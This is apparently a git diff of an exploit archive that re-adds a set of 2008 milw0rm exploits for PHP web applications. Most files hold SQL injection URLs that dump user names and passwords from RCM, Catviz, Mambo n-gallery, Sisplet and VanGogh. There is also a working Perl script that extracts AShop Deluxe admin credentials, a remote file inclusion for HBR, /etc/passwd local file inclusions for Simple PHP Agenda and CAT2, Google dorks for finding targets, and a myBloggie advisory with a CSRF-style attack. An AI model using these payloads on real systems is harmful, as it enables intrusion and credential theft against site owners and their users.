@@ -1,39 +1,39 @@ -########################################################## -# -# RCM Revision Web Development (products.php) SQL Injection Vulnerability -# -# by D3m0n a.k.a Niiub -# -# Home: www.bl4ck-b0x.info -# -# niiub[at]bl4ck-b0x.info -# -########################################################## - - -########################################################## - -Exploit: - -products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name, -user_password),6%20from%20users/* - -OR - -/gr/products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name, -user_password),6%20from%20users/* - -########################################################## - -Note: There can by diffrent number of Table, you have to search. - -Note2: The admin Panel is www.site.com/admin/ but i can't login with the -Password and Login name from the SQL Injection. :( - -########################################################## - -Greetz: dun - sid_psycho - Kacper - Str0ke - -########################################################### - -# milw0rm.com [2008-06-30] +########################################################## +# +# RCM Revision Web Development (products.php) SQL Injection Vulnerability +# +# by D3m0n a.k.a Niiub +# +# Home: www.bl4ck-b0x.info +# +# niiub[at]bl4ck-b0x.info +# +########################################################## + + +########################################################## + +Exploit: + +products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name, +user_password),6%20from%20users/* + +OR + +/gr/products.php?cat=-1%20union%20select%201,2,3,4,concat_ws(0x3a,user_name, +user_password),6%20from%20users/* + +########################################################## + +Note: There can by diffrent number of Table, you have to search. + +Note2: The admin Panel is www.site.com/admin/ but i can't login with the +Password and Login name from the SQL Injection. 
:( + +########################################################## + +Greetz: dun - sid_psycho - Kacper - Str0ke + +########################################################### + +# milw0rm.com [2008-06-30] diff --git a/platforms/php/webapps/5973.php b/platforms/php/webapps/5973.php index 649d1a240..e41c2313b 100755 --- a/platforms/php/webapps/5973.php +++ b/platforms/php/webapps/5973.php @@ -1,114 +1,114 @@ - - -# milw0rm.com [2008-06-30] + + +# milw0rm.com [2008-06-30] diff --git a/platforms/php/webapps/5974.txt b/platforms/php/webapps/5974.txt index 33d5dfd42..15e369226 100755 --- a/platforms/php/webapps/5974.txt +++ b/platforms/php/webapps/5974.txt 
@@ -1,41 +1,41 @@ -###################### -# -#Catviz 0.4.0 beta1 SQL Injection Vulnerability -# -###################### -# -#Bug by: h0yt3r -# -#Dork: n/a -# -#Homepage: catviz.sourceforge.net -# -## -### -## -# -#This CMS suffers from some not correctly verified variables which are used in SQL Querys. -#An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys. -# -#SQL Injection: -#http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL] -#http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL] -# -#PoC: -#index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/* -#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1 -#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0 -# -# -#You get "Go away you nasty intruder wannabe." when you do a wrong login... -# -# -####################### -# -#Greetz to thund3r, b!zZ!t, haZl0oh, WhiT€ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free-Hack and Sys-Flaw and h4ck-y0u. -# -# -####################### -####################### - -# milw0rm.com [2008-06-30] +###################### +# +#Catviz 0.4.0 beta1 SQL Injection Vulnerability +# +###################### +# +#Bug by: h0yt3r +# +#Dork: n/a +# +#Homepage: catviz.sourceforge.net +# +## +### +## +# +#This CMS suffers from some not correctly verified variables which are used in SQL Querys. +#An Attacker can easily get sensitive information from the database by injecting unexpected SQL Querys. 
+# +#SQL Injection: +#http://[target]/[path]/index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=[SQL] +#http://[target]/[path]/index.php?webpages_form=webpage_multi_edit&webpage=[SQL] +# +#PoC: +#index.php?module=news&news_op=form&form_name=article&form_action=show&foreign_key_value=10 union select 1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from mod_users/* +#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=1 +#index.php?webpages_form=webpage_multi_edit&webpage=26 and%201=0 +# +# +#You get "Go away you nasty intruder wannabe." when you do a wrong login... +# +# +####################### +# +#Greetz to thund3r, b!zZ!t, haZl0oh, WhiT€ $h@Dow, $h4d0wl33t, codeblu815, ramon, Free-Hack and Sys-Flaw and h4ck-y0u. +# +# +####################### +####################### + +# milw0rm.com [2008-06-30] diff --git a/platforms/php/webapps/5975.txt b/platforms/php/webapps/5975.txt index da330b981..afff37e68 100755 --- a/platforms/php/webapps/5975.txt +++ b/platforms/php/webapps/5975.txt 
@@ -1,126 +1,126 @@ -netVigilance Security Advisory #40 - -myBloggie version 2.1.6 Multiple SQL Injection Vulnerability -Description: -myBloggie (http://mywebland.com/mybloggie/) is considered one of the -most simple, user-friendliest yet packed with features Weblog system -available to date. Built using PHP & mySQL, web most popular scripting -language & database system enable myBloggie to be installed in any -webservers. -A security problem in the product allows attackers to commit SQL injection. -External References: -Mitre CVE: CVE-2007-1899 -http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1899 -NVD NIST: CVE-2007-1899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1899 -OSVDB: - -Summary: -myBloggie is weblog system built using PHP & mySQL, the webs most -popular scripting language & database system which enable myBloggie to -be installed in any webserver. - -Successful exploitation requires PHP magic_quotes_gpc set to Off and -register_globals set to “On”. -Advisory URL: -http://www.netvigilance.com/advisory0040 - -Release Date: June 30th 2008 - -Severity/Risk: Medium - -CVSS 2.0 Metrics -Access Vector: Network -Access Complexity: High -Authentication: Not-required -Confidentiality Impact: Partial -Integrity Impact: Partial -Availability Impact: Partial -CVSS 2.0 Base Score: 5.1 - -Target Distribution on Internet: Low - -Exploitability: Functional Exploit -Remediation Level: Workaround -Report Confidence: Uncorroborated - -Vulnerability Impact: Attack -Host Impact: SQL Injection. - -SecureScout Testcase ID: TC 17969 - -Vulnerable Systems: -myBloggie version 2.1.6 - -Vulnerability Type: -SQL injection allows malicious people to execute their own SQL scripts. -This could be exploited to obtain sensitive data, modify database -contents or acquire administrator’s privileges. - -Vendor: -myWebland (http://mywebland.com/) - -Vendor Status: -The Vendor has been notified April 9th 2007, but did not respond. 
-Workaround: -In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off - -Example: - -SQL Injection Vulnerability 1: -Create html file with the next content: - - - - - - - - -REQUEST: -Browse this file and click on the button -REPLY: -
    -Category : -[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN -PASSWORD] -Posted By : 1 | -Comments[1] | - - -SQL Injection Vulnerability 2: - -(SQL Injection + XSS Attack Vulnerability) -Create html file with the next content and place it for example on -http://somedomain.com/file.html: - - -
    -
    - - -REQUEST: -Induce a Mybloggie admin to browse the malicious page. -http:// somedomain.com/file.html - -REPLY: -Page containing username and password for Mybloggie admin account. - - -Credits: -Jesper Jurcenoks -Co-founder netVigilance, Inc -www.netvigilance.com - -# milw0rm.com [2008-06-30] +netVigilance Security Advisory #40 + +myBloggie version 2.1.6 Multiple SQL Injection Vulnerability +Description: +myBloggie (http://mywebland.com/mybloggie/) is considered one of the +most simple, user-friendliest yet packed with features Weblog system +available to date. Built using PHP & mySQL, web most popular scripting +language & database system enable myBloggie to be installed in any +webservers. +A security problem in the product allows attackers to commit SQL injection. +External References: +Mitre CVE: CVE-2007-1899 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1899 +NVD NIST: CVE-2007-1899 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1899 +OSVDB: + +Summary: +myBloggie is weblog system built using PHP & mySQL, the webs most +popular scripting language & database system which enable myBloggie to +be installed in any webserver. + +Successful exploitation requires PHP magic_quotes_gpc set to Off and +register_globals set to “On”. +Advisory URL: +http://www.netvigilance.com/advisory0040 + +Release Date: June 30th 2008 + +Severity/Risk: Medium + +CVSS 2.0 Metrics +Access Vector: Network +Access Complexity: High +Authentication: Not-required +Confidentiality Impact: Partial +Integrity Impact: Partial +Availability Impact: Partial +CVSS 2.0 Base Score: 5.1 + +Target Distribution on Internet: Low + +Exploitability: Functional Exploit +Remediation Level: Workaround +Report Confidence: Uncorroborated + +Vulnerability Impact: Attack +Host Impact: SQL Injection. + +SecureScout Testcase ID: TC 17969 + +Vulnerable Systems: +myBloggie version 2.1.6 + +Vulnerability Type: +SQL injection allows malicious people to execute their own SQL scripts. 
+This could be exploited to obtain sensitive data, modify database +contents or acquire administrator’s privileges. + +Vendor: +myWebland (http://mywebland.com/) + +Vendor Status: +The Vendor has been notified April 9th 2007, but did not respond. +Workaround: +In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off + +Example: + +SQL Injection Vulnerability 1: +Create html file with the next content: + + +
    + +
    + + + +REQUEST: +Browse this file and click on the button +REPLY: +
    +Category : +[SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN +PASSWORD] +Posted By : 1 | +Comments[1] | + + +SQL Injection Vulnerability 2: + +(SQL Injection + XSS Attack Vulnerability) +Create html file with the next content and place it for example on +http://somedomain.com/file.html: + + +
    +
    + + +REQUEST: +Induce a Mybloggie admin to browse the malicious page. +http:// somedomain.com/file.html + +REPLY: +Page containing username and password for Mybloggie admin account. + + +Credits: +Jesper Jurcenoks +Co-founder netVigilance, Inc +www.netvigilance.com + +# milw0rm.com [2008-06-30] diff --git a/platforms/php/webapps/5976.pl b/platforms/php/webapps/5976.pl index a7e347528..0ec4f45cf 100755 --- a/platforms/php/webapps/5976.pl +++ b/platforms/php/webapps/5976.pl 
@@ -1,96 +1,96 @@ -#usr/bin/perl -use LWP::UserAgent; -use HTTP::Cookies; -use Getopt::Long; -use URI::Escape; -#-------------------------------------------------------------------------------------------------------------------------------------------------------- -# [x] AShop Deluxe 4.x Remote SQL inJection Exploit -# [x] Ditemukan Oleh : n0c0py - a.k.a 5iR. 4b03D -# [x] Pada Tanggal : 27 juni 2008 -# [x] Vendor : http://www.ashopsoftware.com -# [x] Laporkan pada vendor : 28 Juni 2008 - PatCh ada pada veNdoR -# [x] Dork : - -# [x] Deskripsi : AShop Deluxe shopping cart software automates the processing of -# online orders and payments. It is a shopping cart plus an array of -# specialized tools to support various types of products and selling styles. -# The system automates redundant tasks, organizes data, and simplifies -# the daily operations of an online store. -#-------------------------------------------------------------------------------------------------------------------------------------------------------- -# -# ===============================================================================================================# -# Konsep => -# => http://victim.com/ashop/catalogue.php?cat=-99/**/union/**/select/**/1,0x76756C6E657261626C65/* -# => Versi dibawahnya juga memungkinkan memiliki kutu yang sama -# => password tidak ter-encode membuat eksploitasi semakin mudah -# [Catatan] -# n0c0py tidak bertanggung jawab atas penyalahgunaan exploit ini. 
Greetz: -# { k1tk4t, Autonux, keboaja, k0il, G1 } -# yogyafree => yadoy666, Xshadow, Jack, odod, ray16, indounderground, shadow angel dan segenap Tim -# newhack => fl3xu5, opt1|c, L4in -# masyarakat hacking indonesia [ yogyafree.net | newhack.org | mainhack.com | echo.or.id | kecoak-elektronik.net ] -# ================================================================================================================# - if (@ARGV < 1){ - - print"\nAshop Deluxe 4.x (catalogue.php)"; - print"\nRemote SQL Injection Exploit "; - print"\ncoded by n0c0py "; - print"\n"; - print"\n[!] Penggunaan : perl $0 [Host] [Path] "; - print"\n[!] Contoh : perl $0 127.0.0.1 /ashop "; - print"\n[!] Pilihan :"; - print"\n -p [ip:port] Proxy support "; - print"\n"; -exit; -} - -print "[+] melakukan eksploitasi...\n"; - -eksploitasi(); - -print "\n[+] Bravo!! :D"; -print "\n[+] Eksploitasi Selesai Boss!! :D\n"; - -sub eksploitasi - -{ - my $host = $ARGV[0]; - my $path = $ARGV[1]; - my %options = (); - GetOptions(\%options, "p=s"); - my $url = "http://".$host.$path."/catalogue.php"; - my $sploit = "?cat=-99/**/union/**/select/**/1,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a)/**/from/**/user/*"; - my $exploit= $url.$sploit; - my $ua = LWP::UserAgent->new(); - my $res = ""; - my $content=""; - my $regex = ""; - if($options{"p"}) - { - $ua->proxy('http', "http://".$options{"p"}); - } -#[------------------------------] -# Apakah file eksis? -#[------------------------------] -$res = $ua->get($url); - if(!$res->is_success) - { - print("[+] Gagal! 
file tidak ditemukan!\n"); - print $res->status_line(); - } -#[-------------------------] -# Eksploitasi -#[-------------------------] - $res = $ua->get($exploit); - $content = $res->content; -if ($content =~ /:::(.+):::/) -{ -$regex=$1; -($pengguna,$password)= split('::',$regex); -printf " [x]nama admin = $pengguna \n [x]password admin = $password\n"; -} -else { die "Gagal mengeksploitasi :p \n"; -} - -} - -# milw0rm.com [2008-06-30] +#usr/bin/perl +use LWP::UserAgent; +use HTTP::Cookies; +use Getopt::Long; +use URI::Escape; +#-------------------------------------------------------------------------------------------------------------------------------------------------------- +# [x] AShop Deluxe 4.x Remote SQL inJection Exploit +# [x] Ditemukan Oleh : n0c0py - a.k.a 5iR. 4b03D +# [x] Pada Tanggal : 27 juni 2008 +# [x] Vendor : http://www.ashopsoftware.com +# [x] Laporkan pada vendor : 28 Juni 2008 - PatCh ada pada veNdoR +# [x] Dork : - +# [x] Deskripsi : AShop Deluxe shopping cart software automates the processing of +# online orders and payments. It is a shopping cart plus an array of +# specialized tools to support various types of products and selling styles. +# The system automates redundant tasks, organizes data, and simplifies +# the daily operations of an online store. +#-------------------------------------------------------------------------------------------------------------------------------------------------------- +# +# ===============================================================================================================# +# Konsep => +# => http://victim.com/ashop/catalogue.php?cat=-99/**/union/**/select/**/1,0x76756C6E657261626C65/* +# => Versi dibawahnya juga memungkinkan memiliki kutu yang sama +# => password tidak ter-encode membuat eksploitasi semakin mudah +# [Catatan] +# n0c0py tidak bertanggung jawab atas penyalahgunaan exploit ini. 
Greetz: +# { k1tk4t, Autonux, keboaja, k0il, G1 } +# yogyafree => yadoy666, Xshadow, Jack, odod, ray16, indounderground, shadow angel dan segenap Tim +# newhack => fl3xu5, opt1|c, L4in +# masyarakat hacking indonesia [ yogyafree.net | newhack.org | mainhack.com | echo.or.id | kecoak-elektronik.net ] +# ================================================================================================================# + if (@ARGV < 1){ + + print"\nAshop Deluxe 4.x (catalogue.php)"; + print"\nRemote SQL Injection Exploit "; + print"\ncoded by n0c0py "; + print"\n"; + print"\n[!] Penggunaan : perl $0 [Host] [Path] "; + print"\n[!] Contoh : perl $0 127.0.0.1 /ashop "; + print"\n[!] Pilihan :"; + print"\n -p [ip:port] Proxy support "; + print"\n"; +exit; +} + +print "[+] melakukan eksploitasi...\n"; + +eksploitasi(); + +print "\n[+] Bravo!! :D"; +print "\n[+] Eksploitasi Selesai Boss!! :D\n"; + +sub eksploitasi + +{ + my $host = $ARGV[0]; + my $path = $ARGV[1]; + my %options = (); + GetOptions(\%options, "p=s"); + my $url = "http://".$host.$path."/catalogue.php"; + my $sploit = "?cat=-99/**/union/**/select/**/1,concat(0x3a3a3a,username,0x3a3a,password,0x3a3a3a)/**/from/**/user/*"; + my $exploit= $url.$sploit; + my $ua = LWP::UserAgent->new(); + my $res = ""; + my $content=""; + my $regex = ""; + if($options{"p"}) + { + $ua->proxy('http', "http://".$options{"p"}); + } +#[------------------------------] +# Apakah file eksis? +#[------------------------------] +$res = $ua->get($url); + if(!$res->is_success) + { + print("[+] Gagal! file tidak ditemukan!\n"); + print $res->status_line(); + } +#[-------------------------] +# Eksploitasi +#[-------------------------] + $res = $ua->get($exploit); + $content = $res->content; +if ($content =~ /:::(.+):::/) +{ +$regex=$1; +($pengguna,$password)= split('::',$regex); +printf " [x]nama admin = $pengguna \n [x]password admin = $password\n"; +} +else { die "Gagal mengeksploitasi :p \n"; +} + +} + +# milw0rm.com [2008-06-30] 
diff --git a/platforms/php/webapps/5980.txt b/platforms/php/webapps/5980.txt index 13fd3389c..d75077d64 100755 --- a/platforms/php/webapps/5980.txt +++ b/platforms/php/webapps/5980.txt 
@@ -1,49 +1,49 @@ -########################################### -# # -# Mambo Component n-gallery SQL Injection # -# # -########################################### -# # -##Author : AlbaniaN-[H] # -# # -###Site : http://www.khg-crew.ws # -# # -####Home Page : http://www.vaalon.org # -# # -#####Email : valion@khg-crew.ws # -# # -########################################### -# # -# DORK : allinurl:"com_n-gallery" # -# # -########################################### -# # -############################################################################################################################################################## -# # # -#Exploit 1 : # # -# ################################################################################################################################################# -# # -# index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users-- # -# # -############################################################################################################################################################## -# # # -#Exploit 2 : # # -# ################################################################################################################################################# -# # -# index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* # -# # -############################################################################################################################################################## -# Kosova Hackers Group # -########################################### -# AlbaniaN-[H] # -########################################### -# Republic of Kosova (K) # -########################################### -# Greetings to: urtan,redc00de # -########################################### -# & all Kosova Hackers Group # -########################################### -#&all muslim peoples all over the world :)# 
-########################################### - -# milw0rm.com [2008-06-30] +########################################### +# # +# Mambo Component n-gallery SQL Injection # +# # +########################################### +# # +##Author : AlbaniaN-[H] # +# # +###Site : http://www.khg-crew.ws # +# # +####Home Page : http://www.vaalon.org # +# # +#####Email : valion@khg-crew.ws # +# # +########################################### +# # +# DORK : allinurl:"com_n-gallery" # +# # +########################################### +# # +############################################################################################################################################################## +# # # +#Exploit 1 : # # +# ################################################################################################################################################# +# # +# index.php?option=com_n-gallery&flokkur=-1+union+select+concat(username,char(58),password)KHG+from+mos_users-- # +# # +############################################################################################################################################################## +# # # +#Exploit 2 : # # +# ################################################################################################################################################# +# # +# index.php?option=com_n-gallery&Itemid=29&sP=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mos_users/* # +# # +############################################################################################################################################################## +# Kosova Hackers Group # +########################################### +# AlbaniaN-[H] # +########################################### +# Republic of Kosova (K) # +########################################### +# Greetings to: urtan,redc00de # +########################################### +# & all Kosova Hackers Group # 
+########################################### +#&all muslim peoples all over the world :)# +########################################### + +# milw0rm.com [2008-06-30] diff --git a/platforms/php/webapps/5981.txt b/platforms/php/webapps/5981.txt index bb9e2c556..38569d3aa 100755 --- a/platforms/php/webapps/5981.txt +++ b/platforms/php/webapps/5981.txt 
@@ -1,24 +1,24 @@
-################################################################################
- HBR 1.3 (hm) Remote File Inclusion Vulnerability
-################################################################################
-[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,|
-[~] HOME : www.Real-Hack.net | )(_o/ \o_)( |
-[~] Email : Ghost-r00t@Hotmail.com |/ /\ \|
-[~] Script : HBR 1.3
-[~] Download Script : http://www.hscripts.com/scripts/php/downloads/HBR_1_3.zip
-################## [ I love the Messenger of Allah Mohammad ] ##################
-[~] Error ( hioxBannerRotate.php ) :
-include "$hm/admin/props.php";
-
-[~] Exploit :
-http://xxxx/[Path]/hioxBannerRotate.php?hm=[Evil]
-################## [ I love the Messenger of Allah Mohammad ] ##################
-[~] Gootz :
-PROTO & Night Mare & Mr.PaTcH & Aseg-Rabe7 & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
-Mr.JUVE & Mr.hope & LeGeNd HaCkEr & My Blog [ gh0st10.wordpress.com ] ..
-All Member Real Hack & All My Friends And All Muslims Hackers ..
-################################################################################
- Real Hack Team ( R-H ) ..
-################################################################################
-
-# milw0rm.com [2008-06-30]
+################################################################################
+ HBR 1.3 (hm) Remote File Inclusion Vulnerability
+################################################################################
+[~] Found : Ghost Hacker [ R-H TeaM ] |, .-. .-. ,|
+[~] HOME : www.Real-Hack.net | )(_o/ \o_)( |
+[~] Email : Ghost-r00t@Hotmail.com |/ /\ \|
+[~] Script : HBR 1.3
+[~] Download Script : http://www.hscripts.com/scripts/php/downloads/HBR_1_3.zip
+################## [ I love the Messenger of Allah Mohammad ] ##################
+[~] Error ( hioxBannerRotate.php ) :
+include "$hm/admin/props.php";
+
+[~] Exploit :
+http://xxxx/[Path]/hioxBannerRotate.php?hm=[Evil]
+################## [ I love the Messenger of Allah Mohammad ] ##################
+[~] Gootz :
+PROTO & Night Mare & Mr.PaTcH & Aseg-Rabe7 & x.CJP.x & Dmar al3noOoz & 4Bo3tB ..
+Mr.JUVE & Mr.hope & LeGeNd HaCkEr & My Blog [ gh0st10.wordpress.com ] ..
+All Member Real Hack & All My Friends And All Muslims Hackers ..
+################################################################################
+ Real Hack Team ( R-H ) ..
+################################################################################
+
+# milw0rm.com [2008-06-30]
diff --git a/platforms/php/webapps/5982.txt b/platforms/php/webapps/5982.txt
index adcc29f0a..123593b4b 100755
--- a/platforms/php/webapps/5982.txt
+++ b/platforms/php/webapps/5982.txt
@@ -1,15 +1,15 @@
-@~~===========================================~~@
-| Author => StAkeR ~ StAkeR@hotmail.it |
-@~~===========================================~~@
-+
-@~~==========================================================================~~@
-| Simple PHP Agenda <= 2.2.4 Local File Inclusion Vulnerability |
-@~~==========================================================================~~@
-| index.php?page=../../../../../../../etc/passwd%00
-@~~==========================================================================~~@
-+
-@~~=============================================================================~~@
-| http://dfn.dl.sourceforge.net/sourceforge/php-agenda/php-agenda-2.2.4.tar.gz |
-@~~=============================================================================~~@
-
-# milw0rm.com [2008-07-01]
+@~~===========================================~~@
+| Author => StAkeR ~ StAkeR@hotmail.it |
+@~~===========================================~~@
++
+@~~==========================================================================~~@
+| Simple PHP Agenda <= 2.2.4 Local File Inclusion Vulnerability |
+@~~==========================================================================~~@
+| index.php?page=../../../../../../../etc/passwd%00
+@~~==========================================================================~~@
++
+@~~=============================================================================~~@
+| http://dfn.dl.sourceforge.net/sourceforge/php-agenda/php-agenda-2.2.4.tar.gz |
+@~~=============================================================================~~@
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5983.txt b/platforms/php/webapps/5983.txt
index 58f8fa91e..c5a30c6ef 100755
--- a/platforms/php/webapps/5983.txt
+++ b/platforms/php/webapps/5983.txt
@@ -1,15 +1,15 @@
-@~~===========================================~~@
-| Author => StAkeR ~ StAkeR@hotmail.it |
-@~~===========================================~~@
-+
-@~~==========================================================================~~@
-| CAT2 <= 1.Local File Inclusion Vulnerability |
-@~~==========================================================================~~@
-| objects/extern/spaw/spaw_control.class.php?spaw_root=../../etc/passwd%00 |
-@~~==========================================================================~~@
-+
-@~~====================================================~~@
-| http://downloads.sourceforge.net/cat-2/CAT2-1_2.zip |
-@~~====================================================~~@
-
-# milw0rm.com [2008-07-01]
+@~~===========================================~~@
+| Author => StAkeR ~ StAkeR@hotmail.it |
+@~~===========================================~~@
++
+@~~==========================================================================~~@
+| CAT2 <= 1.Local File Inclusion Vulnerability |
+@~~==========================================================================~~@
+| objects/extern/spaw/spaw_control.class.php?spaw_root=../../etc/passwd%00 |
+@~~==========================================================================~~@
++
+@~~====================================================~~@
+| http://downloads.sourceforge.net/cat-2/CAT2-1_2.zip |
+@~~====================================================~~@
+
+# milw0rm.com [2008-07-01]
diff --git a/platforms/php/webapps/5984.txt b/platforms/php/webapps/5984.txt
index 216e994c2..0074f9b9d 100755
--- a/platforms/php/webapps/5984.txt
+++ b/platforms/php/webapps/5984.txt
@@ -1,59 +1,59 @@ -================================================================= - Sisplet CMS (index.php id) Remote SQL Injection Vulnerability -================================================================= - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 1 July 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : Sisplet CMS - VERSION : 2008-01-24 - VENDOR : http://cms.sisplet.org/ - DOWNLOAD : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip -##################################################### - ---- Remote SQL Injection --- - -** Magic Quote must turn off ** - ------------------------------------ - Vulnerable File (function.php) ------------------------------------ - -$sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'"); - - ---------- - Exploit ---------- - -[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection] - - ------- - POC ------- - -[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0 - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-07-01] +================================================================= + Sisplet CMS (index.php id) Remote SQL Injection Vulnerability +================================================================= + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. 
+ `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 1 July 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : Sisplet CMS + VERSION : 2008-01-24 + VENDOR : http://cms.sisplet.org/ + DOWNLOAD : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip +##################################################### + +--- Remote SQL Injection --- + +** Magic Quote must turn off ** + +----------------------------------- + Vulnerable File (function.php) +----------------------------------- + +$sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'"); + + +--------- + Exploit +--------- + +[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection] + + +------ + POC +------ + +[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0 + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-07-01] diff --git a/platforms/php/webapps/5985.txt b/platforms/php/webapps/5985.txt index e0f8fef20..2dc7d0bce 100755 --- a/platforms/php/webapps/5985.txt +++ b/platforms/php/webapps/5985.txt 
@@ -1,63 +1,63 @@ -=================================================================== - VanGogh Web CMS (article_ID) Remote SQL Injection Vulnerability -=================================================================== - - ,--^----------,--------,-----,-------^--, - | ||||||||| `--------' | O .. CWH Underground Hacking Team .. - `+---------------------------^----------| - `\_,-------, _________________________| - / XXXXXX /`| / - / XXXXXX / `\ / - / XXXXXX /\______( - / XXXXXX / - / XXXXXX / - (________( - `------' - - -AUTHOR : CWH Underground -DATE : 1 July 2008 -SITE : cwh.citec.us - - -##################################################### - APPLICATION : VanGogh Web CMS - VERSION : 0.9 - VENDOR : http://vangogh.holoclan.de/ - DOWNLOAD : http://downloads.sourceforge.net/vangogh/vangogh_0_9.zip -##################################################### - - ---- Remote SQL Injection --- - ------------------------------------ - Vulnerable File (get_article.php) ------------------------------------ - -@Line - - 337: $sql='SELECT text.content, article.lastchanged, parttypes.tag' - 338: .' FROM article,T_A,text,parttypes' - 339: .' 
WHERE article.ID=T_A.AID AND text.ID=T_A.TID AND parttypes.ID=T_A.parttype AND article.ID='.$article_ID; - 340: - 341: $result=mysql_query($sql,$db) or die("$sql : Parse template Query funktioniert ned"); - ---------- - Exploit ---------- - -[+] http://[Target]/[vangogh_path]/index.php?article_ID=[SQL Injection]&get_action=article§ion=5 - - ------- - POC ------- - -[+] http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/**/section&get_action=article§ion=5 - - -################################################################## -# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # -################################################################## - -# milw0rm.com [2008-07-01] +=================================================================== + VanGogh Web CMS (article_ID) Remote SQL Injection Vulnerability +=================================================================== + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + + +AUTHOR : CWH Underground +DATE : 1 July 2008 +SITE : cwh.citec.us + + +##################################################### + APPLICATION : VanGogh Web CMS + VERSION : 0.9 + VENDOR : http://vangogh.holoclan.de/ + DOWNLOAD : http://downloads.sourceforge.net/vangogh/vangogh_0_9.zip +##################################################### + + +--- Remote SQL Injection --- + +----------------------------------- + Vulnerable File (get_article.php) +----------------------------------- + +@Line + + 337: $sql='SELECT text.content, article.lastchanged, parttypes.tag' + 338: .' FROM article,T_A,text,parttypes' + 339: .' 
WHERE article.ID=T_A.AID AND text.ID=T_A.TID AND parttypes.ID=T_A.parttype AND article.ID='.$article_ID; + 340: + 341: $result=mysql_query($sql,$db) or die("$sql : Parse template Query funktioniert ned"); + +--------- + Exploit +--------- + +[+] http://[Target]/[vangogh_path]/index.php?article_ID=[SQL Injection]&get_action=article§ion=5 + + +------ + POC +------ + +[+] http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/**/section&get_action=article§ion=5 + + +################################################################## +# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # +################################################################## + +# milw0rm.com [2008-07-01] diff --git a/platforms/php/webapps/5986.php b/platforms/php/webapps/5986.php index 0203ad706..849cf4c60 100755 --- a/platforms/php/webapps/5986.php +++ b/platforms/php/webapps/5986.php 
